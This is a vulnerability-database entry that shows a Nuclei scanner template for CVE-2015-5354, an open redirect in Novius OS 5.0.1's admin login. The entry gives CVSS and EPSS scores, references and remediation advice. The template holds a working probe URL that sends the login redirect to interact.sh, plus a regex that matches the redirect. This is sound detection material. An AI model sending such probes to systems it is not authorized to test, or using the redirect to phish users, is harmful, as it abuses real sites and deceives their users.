Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-5354
HistoryMay 28, 2022 - 11:33 a.m.

Novius OS 5.0.1-elche - Open Redirect

2022-05-2811:33:47
ProjectDiscovery
github.com
8
cve2015
packetstorm
redirect
novius-os
xss

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

AI Score

6.6

Confidence

High

EPSS

0.002

Percentile

53.4%

Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.

id: CVE-2015-5354

info:
  name: Novius OS 5.0.1-elche - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Novius OS.
  reference:
    - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
    - https://vuldb.com/?id.76181
    - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
    - https://nvd.nist.gov/vul n/detail/CVE-2015-5354
    - https://www.exploit-db.com/exploits/37439/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
    cvss-score: 5.8
    cve-id: CVE-2015-5354
    cwe-id: CWE-601
    epss-score: 0.00166
    epss-percentile: 0.53247
    cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: novius-os
    product: novius_os
  tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

AI Score

6.6

Confidence

High

EPSS

0.002

Percentile

53.4%

Related for NUCLEI:CVE-2015-5354